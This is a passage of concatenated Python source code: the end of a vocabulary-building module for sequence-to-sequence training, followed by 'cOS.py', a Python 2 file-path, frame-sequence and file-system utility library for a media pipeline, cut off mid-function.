Creates a vocabulary mapping from words to ids. Increasing integer ids are assigned by word frequency,
using lexical sorting as a tie breaker. The only exception to this are special symbols such as the padding symbol
(PAD).
:param data_source: Sequence of source sentences containing whitespace delimited tokens.
:param data_target: Sequence of target sentences containing whitespace delimited tokens.
:param single_vocab: Whether to create a single vocab or not.
:param num_words_source: Maximum number of words in the vocabulary for source side.
:param num_words_target: Maximum number of words in the vocabulary for target side.
:param min_count_source: Minimum frequency to include a word in source vocabulary.
:param min_count_target: Minimum frequency to include a word in target vocabulary.
:return: Word-to-id mapping.
"""
vocab_symbols_set = set(VOCAB_SYMBOLS)
if single_vocab:
data = chain(data_source, data_target)
raw_vocab = Counter(
token for line in data for token in get_tokens(line) if token not in vocab_symbols_set
)
logger.info("Initial vocabulary: %d types" % len(raw_vocab))
return prune_vocab(raw_vocab, num_words_source, min_count_source), None
else:
raw_vocab_source = Counter(
token
for line in data_source
for token in get_tokens(line)
if token not in vocab_symbols_set
)
raw_vocab_target = Counter(
token
for line in data_target
for token in get_tokens(line)
if token not in vocab_symbols_set
)
return (
prune_vocab(raw_vocab_source, num_words_source, min_count_source),
prune_vocab(raw_vocab_target, num_words_target, min_count_target),
)
def vocab_to_pickle(vocab: Mapping, path: str):
"""
Saves vocabulary in pickle format.
:param vocab: Vocabulary mapping.
:param path: Output file path.
"""
with open(path, "wb") as out:
pickle.dump(vocab, out)
logger.info('Vocabulary saved to "%s"', path)
def vocab_to_json(vocab: Mapping, path: str):
"""
Saves vocabulary in human-readable json.
:param vocab: Vocabulary mapping.
:param path: Output file path.
"""
with open(path, "w") as out:
json.dump(vocab, out, indent=4, ensure_ascii=False)
logger.info('Vocabulary saved to "%s"', path)
def vocab_from_json_or_pickle(path) -> Dict:
"""
Try loading the json version of the vocab and fall back to pickle for backwards compatibility.
:param path: Path to vocab without the json suffix. If it exists the `path` + '.json' will be loaded as a JSON
object and otherwise `path` is loaded as a pickle object.
:return: The loaded vocabulary.
"""
if os.path.exists(path + JSON_SUFFIX):
return vocab_from_json(path + JSON_SUFFIX)
else:
return vocab_from_pickle(path)
def vocab_from_pickle(path: str) -> Dict:
"""
Load vocab from pickle
:param path: Path to pickle file containing the vocabulary.
:return: The loaded vocabulary.
"""
with open(path, "rb") as inp:
vocab = pickle.load(inp)
logger.info('Vocabulary (%d words) loaded from "%s"', len(vocab), path)
return vocab
def vocab_from_json(path: str) -> Dict:
"""
Load vocab from JSON
:param path: Path to json file containing the vocabulary.
:return: The loaded vocabulary.
"""
with open(path, encoding=VOCAB_ENCODING) as inp:
vocab = json.load(inp)
logger.info('Vocabulary (%d words) loaded from "%s"', len(vocab), path)
return vocab
def reverse_vocab(vocab: Dict[str, int]) -> Dict[int, str]:
"""
Returns value-to-key mapping from key-to-value-mapping.
:param vocab: Key to value mapping.
:return: A mapping from values to keys.
"""
return {v: k for k, v in vocab.items()}
def main():
params = argparse.ArgumentParser(
description="CLI to build vocabulary and pre-process input file."
)
required = params.add_argument_group("required arguments")
add_vocab_args(required, params)
args = params.parse_args()
if not args.vocab_source_json or not args.vocab_target_json:
vocab_source, vocab_target = build_from_paths(
input_source=args.train_source,
input_target=args.train_target,
single_vocab=args.single_vocab,
num_words_source=args.num_words_source,
num_words_target=args.num_words_target,
min_count_source=args.word_min_count_source,
min_count_target=args.word_min_count_target,
)
logger.info("Source vocabulary size: %d ", len(vocab_source))
vocab_to_json(vocab_source, "vocab.src" + JSON_SUFFIX)
if not vocab_target:
vocab_target = vocab_source
logger.info("Target vocabulary size: %d ", len(vocab_target))
vocab_to_json(vocab_target, "vocab.trg" + JSON_SUFFIX)
else:
vocab_source = vocab_from_json(args.vocab_source_json)
vocab_target = vocab_from_json(args.vocab_target_json)
vocab_target = vocab_target or vocab_source
write_to_file(
args.train_source, args.train_target, args.train_output, vocab_source, vocab_target
)
if args.val_source and args.val_target:
write_to_file(
args.val_source,
args.val_target,
args.val_output,
vocab_source,
vocab_target,
"validation",
)
if __name__ == "__main__":
main()
|
cOS.py
|
import os
import time
import sys
import subprocess
import glob
import collections
import shutil
from distutils import dir_util
import re
import fnmatch
import Queue
import threading
import getpass
import platform
import multiprocessing
if sys.platform.startswith('win'):
import _winreg
try:
from win32com.client import Dispatch
except ImportError:
pass
# import psutil
try:
import psutil
except:
pass
# Helpers
##################################################
def ensureArray(val):
'''
If input is an array, return input. If not, make it first element of a list.
'''
if isinstance(val, (list, tuple)):
return list(val)
if (val == None):
return []
return [val]
# Normalization
##################################################
def ensureEndingSlash(path):
'''
Ensures that the path has a trailing '/'
'''
path = unixPath(path)
if path[-1] != '/':
path += '/'
return path
def removeStartingSlash(path):
'''
Removes backslashes and forward slashes from the
beginning of directory names.
'''
if (path[0] == '\\' or path[0] == '/'):
path = path[1:]
return path
def normalizeDir(path):
'''
Dirs always use forward slashses and have a trailing slash.
'''
# lower case drive letters
if path[1] == ':':
path = path[0].lower() + path[1:]
# ensureEndingSlash already makes sure
# the path is a unixPath
return ensureEndingSlash(path)
def normalizePath(path):
'''
Replaces all backslashes
with forward slashses.
Removed: removeStartingSlash
'''
return unixPath(path)
def normalizeAndJoin(path, *paths):
'''
Joins paths, replacing backslashes with forward slashes.
'''
return normalizePath(os.path.join(ensureEndingSlash(path), *paths))
def unixPath(path):
'''
Changes backslashes to forward slashes and
removes successive slashes, ex \\ or \/
'''
# lower case drive letters
if len(path) > 1 and path[1] == ':':
path = path[0].lower() + path[1:]
# bit hacky, but basically we want to keep
# :// for http:// type urls
# so we split on that, replace the slashes in the parts
# then join it all back together
parts = path.split('://')
replaced = [re.sub(r'[\\/]+', '/', p) for p in parts]
return '://'.join(replaced)
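# Examples (comments added for clarity; not in the original file):
#   unixPath('C:\\foo\\bar//baz')        -> 'c:/foo/bar/baz'
#   unixPath('http://example.com//a\\b') -> 'http://example.com/a/b'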
# Extensions
##################################################
def getExtension(path):
'''
Returns file extension all lowercase with no whitespace
'''
pathParts = path.split('.')
if len(pathParts) > 1:
if pathParts[-1].lower() == 'sc':
return '.'.join([pathParts[-1], pathParts[-2]]).lower().strip()
return pathParts[-1].lower().strip()
return ''
def normalizeExtension(filepath):
'''
Returns file extension all lowercase with no whitespace
'''
filepath = unixPath(filepath)
extension = getExtension(filepath)
filePieces = filepath.split('.')
filePieces[-1] = extension
return '.'.join(filePieces)
def removeExtension(filename):
'''
Removes extension from filename.
'''
if '.' not in filename:
return filename
return '.'.join(filename.split('.')[:-1])
def ensureExtension(filename, extension):
'''
Checks that a given file has the given extension.
If not, appends the extension.
'''
extension = extension.lower().strip()
if extension[0] == '.':
extension = extension[1:]
if (getExtension(filename) != extension):
return filename + '.' + extension
return filename
# Initials
##################################################
def getInitials(filename):
versionUserRegEx = re.compile(r'_[vV][0-9]{3,4}_([a-z]{3})?')
versionUserSearch = versionUserRegEx.search(filename)
if versionUserSearch:
return versionUserSearch.group(1)
return None
# Versioning
##################################################
def getVersion(filename):
'''
Returns version number of a given filename.
'''
try:
if str(int(filename)) == filename:
return int(filename)
except:
pass
try:
if int(filename) == filename:
return int(filename)
except:
pass
match = re.findall('[vV]([0-9]+)', filename)
if (match):
return int(match[-1])
return None
def incrementVersion(filename, initials=''):
'''
Increments a file's version number
'''
version = getVersion(filename) + 1
# _v0001_abc.
withInitials = r'_[vV][0-9]+_[a-z]{3}\.'
# _v0001
withoutInitials = r'_[vV][0-9]+'
# _abc.ext
noVersion = r'_[a-z]{3}\.([a-z0-9]+)$'
if len(initials):
if not re.search(withInitials, filename):
m = re.search(noVersion, filename)
if not m:
raise Exception('Filename version and initials do not match expected format.')
# A_abc.ext -> A_v0001_xyz.ext
return re.sub(noVersion, '_v0001_%s.%s' % (initials, m.group(1)), filename)
# A_v0001_abc.ext -> A_v0002_xyz.ext
return re.sub(withInitials, '_v%04d_%s.' % (version, initials), filename)
else:
# A_v0001_abc.ext -> A_v0002_abc.ext
return re.sub(withoutInitials, '_v%04d' % version, filename)
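# Examples (comments added for clarity; not in the original file):
#   incrementVersion('shot_v0003_abc.nk', 'def') -> 'shot_v0004_def.nk'
#   incrementVersion('shot_v0003.nk')            -> 'shot_v0004.nk'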
def getHighestVersionFilePath(root, name=None, extension=''):
'''
Returns highest version from a given root, matching a given extension.
'''
# fix: should have normalize extension
# ensure dot on extension
if not len(extension) or extension[0] != '.':
extension = '.' + extension
root = normalizeDir(root)
highestVersion = -99999999
path = False
if not name:
for f in glob.iglob(root + '*' + extension):
# keeps .nk~ etc from showing up
if not f.endswith(extension):
continue
fileVersion = getVersion(f)
if fileVersion > highestVersion:
path = unixPath(f)
highestVersion = fileVersion
else:
# regex for checking and getting the user initials (if present) and the version info
versionUserRegEx = re.compile('_v[0-9]{4}(_[a-z]{3})?')
versionUser = ''
if versionUserRegEx.search(name):
versionUser = versionUserRegEx.search(name).group()
onlyName = name.replace(versionUser, '')
for f in glob.iglob(root + onlyName + '*' + extension):
# keeps .nk~ etc from showing up
if not f.endswith(extension):
continue
fileVersion = getVersion(f)
if fileVersion > highestVersion:
path = unixPath(f)
highestVersion = fileVersion
return path
def createVersionedFilename(filename, version, padding=4, extension=''):
'''
Returns filename with version and extension
'''
return filename + '_v' + str(version).zfill(padding) + '.' + extension
# Information
##################################################
def getDirName(filename):
'''
Returns directory name of a file with a trailing '/'.
'''
return normalizeDir(os.path.dirname(filename))
def upADir(path):
'''
Returns the path, up a single directory.
'''
path = getDirName(path)
parts = path.split('/')
if (len(parts) < 3):
return path
return '/'.join(parts[:-2]) + '/'
def getPathInfo(path, options={}):
'''
Returns object with file's basename, extension, name, dirname and path.
With options, can also return root, relative dirname, and relative path, and
make all fields lowercase.
'''
if not path or len(path) == 0:
return {
'path': '',
'dirname': '',
'basename': '',
'extension': '',
'name': '',
'filebase': '',
'root': '',
'relativeDirname': '',
'relativePath': '',
}
pathInfo = {}
pathInfo['path'] = normalizePath(path)
pathParts = pathInfo['path'].split('/')
pathInfo['dirname'] = '/'.join(pathParts[:-1]) + '/'
pathInfo['basename'] = pathParts[-1]
pathInfo['extension'] = pathParts[-1].split('.')[-1].strip().lower()
if pathInfo['extension'] == 'sc':
pathInfo['extension'] = '.'.join(pathParts[-1].split('.')[-2:]).strip().lower()
pathInfo['name'] = pathInfo['basename'].replace('.' + pathInfo['extension'], '')
pathInfo['filebase'] = pathInfo['path'].replace('.' + pathInfo['extension'], '')
# fix: relative path could be improved but it's a start
if options.get('root'):
pathInfo['root'] = normalizeDir(options['root'])
pathInfo['relativeDirname'] = './' + removeStartingSlash(normalizeDir(pathInfo['dirname'].replace(pathInfo['root'], '')))
pathInfo['relativePath'] = './' + removeStartingSlash(normalizePath(pathInfo['path'].replace(pathInfo['root'], '')))
else:
# for linux
if pathParts[0] == '':
pathInfo['root'] = '/' + pathParts[1] + '/'
# for windows
else:
pathInfo['root'] = pathParts[0] + '/'
if options.get('lowercaseNames'):
# uncomment in Sublime 3
# pathInfo = {x: x.lower() for x in pathInfo}
pathInfo = dict([(x, x.lower()) for x in pathInfo])
return pathInfo
# fix:
# this:
# text/frame.%04d.exr
# will match
# text/frame.tacos.bananas.%04d.exr
# cuz getFiles needs to take a regex
def getFrameRange(path):
'''
Returns a dictionary with min, max, duration,
base, ext, and complete
Parameters:
path - Generic file in sequence. Ex. text/frame.%04d.exr
'''
if not isValidSequence(path):
print 'Not a valid sequence'
return None
path = normalizeFramePadding(path)
padding = getPadding(path)
pathInfo = getPathInfo(path)
extension = pathInfo['extension']
seqDir = pathInfo['dirname']
seqName = '.'.join(pathInfo['name'].split('.')[:-1])
digitsPadding = '\.\d+\.'
files = getFiles(seqDir,
fileIncludes=[seqName + digitsPadding + extension], depth=0, filesOnly=True, regex=True)
if not len(files):
return None
files.sort()
firstFileInfo = getPathInfo(files[0])
try:
minFrame = int(firstFileInfo['name'].split('.')[-1])
maxFrame = int(getPathInfo(files[-1])['name'].split('.')[-1])
except:
return None
if padding == 0:
paddingString = '%d'
else:
paddingString = '%0' + str(padding) + 'd'
duration = maxFrame - minFrame + 1
count = len(files)
return {
'min': minFrame,
'max': maxFrame,
'duration': duration,
'base': firstFileInfo['dirname'] + firstFileInfo['name'],
'baseUnpadded': seqName,
'extension': extension,
'complete': duration == count,
'path': path,
'padding': padding,
'paddingString': paddingString,
'paddedFilename': seqName + '.' + paddingString + '.' + extension,
'paddedPath': seqDir + seqName + '.' + paddingString + '.' + extension,
}
# copy of arkUtil's getPadding, but instead of throwing an error
# it returns 0 when there is no frame padding
# To Do: use this in place of arkUtil getPadding soon!
def getPadding(filepath):
pathInfo = getPathInfo(filepath)
fName = pathInfo['name']
hashReg = re.compile('##+')
dollarReg = re.compile('\$F[1-9]?')
frameReg = re.compile('%[0-9]{0,2}d')
frameNumberReg = re.compile('[0-9]+')
# if the name is only numbers or only frame padding
nameParts = fName.split('.')
if len(nameParts) < 2:
return 0
# gets position of frame padding
framePadding = fName.split('.')[-1]
if hashReg.match(framePadding):
padding = framePadding.count('#')
elif dollarReg.match(framePadding):
padding = framePadding[-1]
if padding == 'F':
return 0
elif frameReg.match(framePadding):
paddingReg = re.compile('[0-9]{1,2}')
if paddingReg.search(framePadding):
padding = paddingReg.search(framePadding).group()
else:
return 0
elif frameNumberReg.match(framePadding):
padding = len(framePadding)
if padding <= 2:
return 0
else:
return 0
return int(padding)
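# Illustrative values (hypothetical filenames), covering each padding style handled above:
#   getPadding('shot/beauty.####.exr')  -> 4
#   getPadding('shot/beauty.$F4.exr')   -> 4
#   getPadding('shot/beauty.%04d.exr')  -> 4
#   getPadding('shot/beauty.1001.exr')  -> 4
#   getPadding('shot/beauty.1.exr')     -> 0  (two digits or fewer is treated as no padding)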
def normalizeFramePadding(filepath):
pathInfo = getPathInfo(filepath)
fName = pathInfo['name']
hashReg = re.compile('##+')
dollarReg = re.compile('\$F[1-9]?')
frameNumberReg = re.compile('[0-9]+')
# if the name is only numbers or only frame padding
nameParts = fName.split('.')
if len(nameParts) < 2:
return filepath
# gets position of frame padding
framePadding = fName.split('.')[-1]
if hashReg.match(framePadding):
padding = framePadding.count('#')
elif dollarReg.match(framePadding):
padding = framePadding[-1]
# if no number exists after $F then padding is None
if padding == 'F':
padding = None
elif frameNumberReg.match(framePadding):
padding = len(framePadding)
# if total number of digits is less than 2 then assume padding is None
if padding <= 2:
padding = None
else:
return filepath
# if padding is None(A.B.1.abc), then padded file name will be (A.B.%d.abc)
# if there is no padding(A.B.abc), then padded file will still be A.B.abc
newPadding = '%0' + str(padding) + 'd'
if not padding:
newPadding = '%d'
return filepath.replace(framePadding, newPadding)
def isValidSequence(filepath):
pathInfo = getPathInfo(filepath)
fName = pathInfo['name']
# if the name is only numbers or only frame padding
nameParts = fName.split('.')
if len(nameParts) < 2:
return False
# gets position of frame padding
framePadding = fName.split('.')[-1]
hashReg = re.compile('##+')
dollarReg = re.compile('\$F[1-9]?')
frameReg = re.compile('%[0-9]{0,2}d')
frameNumberReg = re.compile('[0-9]+')
# if padding text match with any padding regex
if not hashReg.match(framePadding) and not \
dollarReg.match(framePadding) and not \
frameReg.match(framePadding) and not \
frameNumberReg.match(framePadding):
return False
return True
def getSequenceBaseName(filename, matchNumbersOnly=True):
if matchNumbersOnly:
regex_baseName = re.compile('(.+)[_\.][0-9]+\.[a-z0-9]+$')
else:
# name.%04d.ext
regex_baseName = re.compile('(.+)[_\.]%[0-9]+d\.[a-z0-9]+$')
filename = normalizeFramePadding(filename)
try:
baseName = regex_baseName.search(filename).group(1)
return baseName
except:
raise IndexError('The filename given does not have the \
format <name>_<frameNumber>.<extension> or \
<name>.<frameNumber>.<extension>: %s' % filename)
def getFrameNumber(filename):
regex_FrameNumber = re.compile('.+[_\.]([0-9]+)\.[a-z0-9]+$')
try:
frame = regex_FrameNumber.search(filename).group(1)
return frame
except:
raise IndexError('The filename given does not have the \
format <name>_<frameNumber>.<extension> or \
<name>.<frameNumber>.<extension>: %s' % filename)
def isFrameRangeText(filename):
regex = re.compile('^[a-zA-Z0-9._/:%]+ [0-9]+-[0-9]+$')
return regex.match(filename) is not None
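# Illustrative (hypothetical paths):
#   isFrameRangeText('renders/beauty.%04d.exr 1001-1005')  -> True
#   isFrameRangeText('renders/beauty.%04d.exr')            -> False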
def getFrameRangeText(filename, frameRange=None):
if not frameRange:
frameRange = getFrameRange(filename)
if not frameRange:
raise Exception('Invalid filename: ' + filename)
return filename + ' %d-%d' % \
(frameRange['min'], frameRange['max'])
def getFirstFileFromFrameRangeText(fileText):
'''
Supports 3 methods of import for imageSequences
Gets frame: 1001 of imageSequence
Uses getFrameRange to find all images in matching sequence
Requires filename in format '../image.%0[1-9]d.png' etc,
with %0[1-9]d or other type of specification included in string
'''
filepath = normalizePath(fileText)
filePieces = filepath.split(' ')
filePieces[0] = normalizeFramePadding(filePieces[0])
fileInfo = getPathInfo(filePieces[0])
paddingRegEx = re.compile('%[0-9]{0,2}d')
if len(filePieces) == 2 and \
paddingRegEx.search(filePieces[0]) and \
unicode(filePieces[1].split('-')[0]).isnumeric():
padding = fileInfo['name'].split('.')[-1]
frame = padding % int(filePieces[1].split('-')[0])
filepath = filePieces[0].replace(padding, frame)
elif len(filePieces) == 1 and \
paddingRegEx.search(filePieces[0]):
padding = fileInfo['name'].split('.')[-1]
frameRangeDict = getFrameRange(fileText)
if not frameRangeDict:
return False
frame = padding % int(frameRangeDict['min'])
filepath = frameRangeDict['base'].replace(padding, frame) + '.' + frameRangeDict['extension']
elif len(filePieces) == 1:
pathInfo = getPathInfo(filePieces[0])
try:
if unicode(pathInfo['name'].split('.')[-1]).isnumeric():
filepath = filePieces[0]
else:
return False
except:
return False
else:
print 'Invalid image sequence!'
return False
return filepath
def openFileBrowser(path):
if os.path.isfile(path):
path = path.rpartition('/')[0]
if isWindows():
os.startfile(path)
if isLinux():
subprocess.check_call(['xdg-open', '--', path])
if isMac():
subprocess.check_call(['open', '--', path])
def isValidEXR(filename, silent=False):
import OpenImageIO
image = OpenImageIO.ImageInput.open(filename)
if not image:
if not silent:
print 'Invalid EXR, not found:', filename
return False
try:
spec = image.spec()
if spec.tile_width == 0:
for y in range(spec.y, spec.y + spec.height):
pixels = image.read_scanline (y, spec.z, OpenImageIO.UNKNOWN)
if pixels == None:
if not silent:
print 'ERROR: EXR broken at scanline', y
return False
return True
except Exception as err:
if not silent:
print err
return False
def isValidEXRSequence(paddedFilename, silent=False):
frameRange = getFrameRange(paddedFilename)
if not frameRange or not frameRange['complete']:
return False
for f in range(frameRange['min'], frameRange['max'] + 1):
if not isValidEXR(frameRange['path'] % f):
return False
return True
# System Operations
##################################################
# fix: needs to work for linux / osx
def setEnvironmentVariable(key, val, permanent=True):
'''
Sets a given environment variable for the OS.
Parameters:
key - environment variable
val - value for the environment variable
'''
val = str(val)
os.environ[key] = val
if not permanent:
return True
# set the environment variable permanently
# super simple on windows, just use setx
if isWindows():
os.system('setx %s "%s"' % (key, val))
# set variables in the /etc/environment file
# on mac and linux
elif isMac() or isLinux():
os.system('export %s=%s' % (key, val))
environmentFile = '/etc/environment'
setString = key + '=' + val + '\n'
# read all the lines in
with open(environmentFile) as f:
lines = f.readlines()
found = False
i = 0
while i < len(lines):
if lines[i].startswith(key + '='):
# if we've already set the variable
# just remove the line
if found:
del lines[i]
# otherwise ensure the line is set
# to the correct value
else:
lines[i] = setString
found = True
i += 1
# if we never found the variable
# append a line to set it
if not found:
lines.append(setString)
# then write all the lines back to the
# environmentFile
with open(environmentFile, 'w') as f:
for line in lines:
f.write(line.replace(' ',''))
def removeEnvironmentVariable(key):
'''
Deletes environment variable
Parameters:
key - environment variable
'''
if isWindows():
if key in os.environ:
currentUserKeyReg = _winreg.ConnectRegistry(None, _winreg.HKEY_CURRENT_USER)
envKeyReg = _winreg.OpenKey(currentUserKeyReg, 'Environment', 0, _winreg.KEY_ALL_ACCESS)
try:
_winreg.DeleteValue(envKeyReg, key)
except WindowsError:
print 'Couldn\'t find ', key
pass
_winreg.CloseKey(envKeyReg)
def joinEnvironmentPaths(*args):
'''
Joins all unique non-None paths, useful for setting paths in environment variables
'''
return os.pathsep.join(filter(None, set(args)))
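# Illustrative (hypothetical paths); because duplicates are removed with set(),
# the order of the joined paths is not guaranteed:
#   joinEnvironmentPaths('/opt/a/bin', None, '/opt/b/bin', '/opt/a/bin')
#   -> '/opt/a/bin:/opt/b/bin' (or the reverse; os.pathsep is ':' on POSIX, ';' on Windows)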
def conformEnvironment(mapping):
'''Ensure all entries in *mapping* are strings.
Stolen from ftrack.
.. note::
The *mapping* is modified in place.
'''
if not isinstance(mapping, collections.MutableMapping):
return
for key, value in mapping.items():
if isinstance(value, collections.Mapping):
conformEnvironment(value)
else:
value = str(value)
del mapping[key]
mapping[str(key)] = value
# unset variables in the /etc/environment file
# on mac and linux
# WORK IN PROGRESS
# elif isLinux():
# os.system('export %s=%s' % (key))
# environmentFile = '/etc/environment'
# unsetString = key + '\n'
# # read all the lines in
# with open(environmentFile) as f:
# lines = f.readlines()
# found = False
# i = 0
# while i < len(lines):
# if lines[i].startswith(key):
# # if we've already unset the variable
# # just remove the linereg
# if found:
# del lines[i]
# # otherwise ensure the line is set
# # to the correct value
# else:
# lines[i] = unsetString
# found = True
# i += 1
# # if we never found the variable
# # append a line to set it
# if not found:
# lines.append(unsetString)
# # then write all the lines back to the
# # environmentFile
# with open(environmentFile, 'w') as f:
# for line in lines:
# f.write(line.replace(' ',''))
# Windows shortcut helpers, adapted from the Mouse vs Python blog
def createShortcut(path, target='', wDir='', icon=''):
ext = path[-3:]
if ext == 'url':
shortcut = file(path, 'w')
shortcut.write('[InternetShortcut]\n')
shortcut.write('URL=%s' % target)
shortcut.close()
else:
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(path)
shortcut.Targetpath = target
shortcut.WorkingDirectory = wDir
if icon == '':
pass
else:
shortcut.IconLocation = icon
shortcut.save()
def makeDir(dirname):
'''
    Wrapper for os.mkdir. Returns True on success, or the error on failure.
'''
try:
os.mkdir(dirname)
return True
except Exception as err:
return err
def makeDirs(path):
'''
    Wrapper for os.makedirs; creates all intermediate directories for the directory portion of the given path.
'''
dirName = getDirName(path)
try:
os.makedirs(dirName)
except Exception as err:
return err
def join(a, b):
'''
Concatenates a directory with a file path
using forward slashes.
'''
b = removeStartingSlash(b)
return normalizeDir(a) + normalizePath(b)
def removeFile(path):
'''
Wrapper for os.remove, returns the error instead of
throwing it
'''
if os.path.isdir(path):
return Exception('Path is a directory, not a file')
try:
os.remove(path)
return True
except Exception as err:
# If error is "not exists", don't raise, just return
if not os.path.exists(path):
return err
else:
raise err
def removeDir(path):
'''
Removes a directory. Returns the error instead of
throwing it
'''
if os.path.isfile(path):
return Exception('Path is a file, not a directory')
try:
shutil.rmtree(path)
return True
except Exception as err:
# If error is "not exists", don't raise, just return
if not os.path.exists(path):
return err
else:
raise err
def emptyDir(folder,onlyFiles=False, waitTime=5):
'''
Removes all files and folders from a directory.
Parameters:
folder - directory from which to delete
onlyFiles - False by default, if only files should be deleted
        waitTime - 5 by default, maximum number of seconds to spend deleting before bailing out.
'''
# if onlyFiles:
# print 'Deleting all files in: %s' % folder
# else:
# print 'Deleting all files and folders in: %s' % folder
startTime = time.time()
for root, dirs, files in os.walk(folder):
if (time.time() > startTime + waitTime):
break
for f in files:
if (time.time() > startTime + waitTime):
break
try:
os.unlink(os.path.join(root, f))
except:
pass
if not onlyFiles:
for d in dirs:
if (time.time() > startTime + waitTime):
break
try:
shutil.rmtree(os.path.join(root, d))
except:
pass
def copy(src, dst):
return shutil.copy2(src, dst)
def copyTree(src, dst, symlinks=False, ignore=None):
'''
Copies the src directory tree to the destination.
'''
dir_util.copy_tree(src, dst)
def copyFileSequence(src, dst, rangeInfo=False, echo=False):
if '%' not in src:
print 'No frame padding in:', src
return False
if '%' not in dst:
print 'No frame padding in:', dst
return False
if not rangeInfo:
rangeInfo = getFrameRange(src)
result = True
for i in range(rangeInfo['min'], rangeInfo['max'] + 1):
sourcePath = src % i
destPath = dst % i
if echo:
print sourcePath, ' > ', destPath
try:
shutil.copyfile(sourcePath, destPath)
except:
print 'Could not copy:', sourcePath, destPath
result = False
return result
def rename(oldPath, newPath):
oldPath = normalizePath(oldPath)
newPath = normalizePath(newPath)
os.rename(oldPath, newPath)
def cwd():
'''
Returns the current working directory.
'''
return normalizeDir(os.getcwd())
def getOSUsername():
if isLinux():
return os.getenv('USER')
else:
return getpass.getuser()
def getComputerName():
return platform.node()
def setComputerName(computerName):
currentName = platform.node()
if isWindows():
getCommandOutput('wmic computersystem where caption="'+ currentName + '" rename ' + computerName)
elif isLinux():
getCommandOutput('hostnamectl set-hostname "' + computerName + '"')
else:
raise Exception('Invalid OS')
def getUserHome():
userHome = os.environ.get('HOME') or os.environ.get('HOMEPATH') or os.environ.get('USERPROFILE')
return normalizeDir(userHome)
def duplicateDir(src, dest):
'''
Duplicates a directory, copying files that don't already exist.
'''
src = ensureEndingSlash(src)
dest = ensureEndingSlash(dest)
for root, dirs, files in os.walk(src):
for n in dirs:
srcFolder = root + '/' + n
print 'dir:', srcFolder
destFolder = srcFolder.replace(src, dest)
if not os.path.isdir(destFolder):
try:
os.makedirs(destFolder)
print 'mkdir:', destFolder
except Exception as err:
print err
print 'Could not mkdir: ', destFolder
for n in files:
srcFilename = root + '/' + n
print 'file:', srcFilename
destFilename = srcFilename.replace(src, dest)
if not os.path.isfile(destFilename):
try:
print 'copy:', srcFilename
shutil.copy(srcFilename, destFilename)
except Exception as err:
print err
print 'Could not copy: ', srcFilename
else:
print 'exists:', srcFilename
def getFolderContents(filepath, includeFiles=True, includeFolders=True):
'''
Returns files and folders directly under the path.
'''
paths = []
files = os.listdir(filepath)
for f in files:
filename = os.path.join(filepath, f)
isDir = os.path.isdir(filename)
if includeFolders and isDir:
paths.append(normalizeDir(filename))
elif includeFiles and not isDir:
paths.append(normalizePath(filename))
return paths
def collectFiles(searchPaths, extensions, exclusions):
'''
Gets all files in the searchPaths with given extensions.
Parameters:
searchPaths - list of paths to search
extensions - list of extensions for which to look
exclusions - files to exclude from final list
'''
filesToReturn = []
searchPaths = ensureArray(searchPaths)
extensions = ensureArray(extensions)
exclusions = ensureArray(exclusions)
for path in searchPaths:
for root, dirs, files in os.walk(path):
for name in files:
name = join(normalizeDir(root), normalizePath(name))
if (getExtension(name) in extensions) and (name not in exclusions):
if name not in filesToReturn:
filesToReturn.append(getPathInfo(name))
return filesToReturn
def collectAllFiles(searchDir):
'''
Returns all files within a specified searchDir.
'''
searchDir = normalizeDir(searchDir)
filesToReturn = []
for root, dirs, files in os.walk(searchDir):
for name in files:
name = join(normalizeDir(root), normalizePath(name))
if name not in filesToReturn:
filesToReturn.append(getPathInfo(name))
return filesToReturn
def collapseFiles(fileList, imageSequencesOnly=False):
fileList.sort()
collapsedList = []
i = 0
# New Logic to rename sequential files in QList
# [abc_xyz.1001.png, abc_xyz.1002.png]
while i < len(fileList):
# [abc_xyz][1001][png]
fileSections = fileList[i].split('.')
# check if name is not an image sequence
if len(fileSections) <= 2:
if not imageSequencesOnly:
collapsedList.append(fileList[i])
i += 1
else:
try:
# check if second last piece is a number or not
int(fileSections[-2])
# leftFileSection = [abc_xyz]
leftFileSection = fileSections[0]
# rightFileSection = [png]
rightFileSection = fileSections[2]
j = i
# keep incrementing second loop till left and right sections are the same
while j < len(fileList) and \
leftFileSection == fileSections[0] and \
rightFileSection == fileSections[2]:
j += 1
try:
# [abc_xyz][1002][png]
newFilePieces = fileList[j].split('.')
# [abc_xyz]
leftFileSection = newFilePieces[0]
# [png]
rightFileSection = newFilePieces[2]
except IndexError:
pass
lastFrame = j
collapsedList.append(fileSections[0] +
'.%0' + str(len(fileSections[1])) + 'd.' +
fileSections[2] + ' ' +
str(int(fileSections[-2])) + '-' +
str(int(fileSections[-2]) + lastFrame - i - 1))
i = j
except ValueError:
collapsedList.append(fileList[i])
i += 1
return collapsedList
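# Illustrative (hypothetical file list):
#   collapseFiles(['shot/beauty.1001.exr', 'shot/beauty.1002.exr', 'shot/beauty.1003.exr'])
#   -> ['shot/beauty.%04d.exr 1001-1003']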
# def getDirs(path):
# return getFiles(path, fileExcludes=['*'], depth=0)
# fix: add depth
def getFiles(path,
fileIncludes=[],
folderIncludes=[],
fileExcludes=[],
folderExcludes=[],
includeAfterExclude=False,
depth=-1,
filesOnly=False,
fullPath=True,
regex=False):
'''
if the folder or file include/exclude lists have an *
getFiles() will use wildcard matching, otherwise it will
use simple "in"-style matching
    Ex: see the illustrative call after this function
'''
if fileIncludes:
fileIncludes = ensureArray(fileIncludes)
if folderIncludes:
folderIncludes = ensureArray(folderIncludes)
if fileExcludes:
fileExcludes = ensureArray(fileExcludes)
if folderExcludes:
folderExcludes = ensureArray(folderExcludes)
    def pathMatches(pattern, path, fullPath):
        # regex patterns are matched against both the full path and the basename
        if regex:
            return bool(re.match(pattern, fullPath) or re.match(pattern, path))
        # wildcard matching when the pattern contains a *
        if '*' in pattern:
            return fnmatch.fnmatch(fullPath, pattern) or \
                fnmatch.fnmatch(path, pattern)
        # otherwise simple "in"-style matching
        return pattern in fullPath
def shouldInclude(path, root, isDir=False):
fullPath = unixPath(os.path.join(root, path))
if fileIncludes and not isDir:
for pattern in fileIncludes:
if pathMatches(pattern, path, fullPath):
return True
if not includeAfterExclude:
return False
if folderIncludes and isDir:
for pattern in folderIncludes:
if pathMatches(pattern, path, fullPath):
return True
if not includeAfterExclude:
return False
if isDir:
for pattern in folderExcludes:
if pathMatches(pattern, path, fullPath):
return False
else:
for pattern in fileExcludes:
if pathMatches(pattern, path, fullPath):
return False
return True
# custom walk method with depth
# link for reference: http://stackoverflow.com/questions/229186/os-walk-without-digging-into-directories-below
def walkLevel(directory, depth=-1):
directory = directory.rstrip(os.path.sep)
assert os.path.isdir(directory)
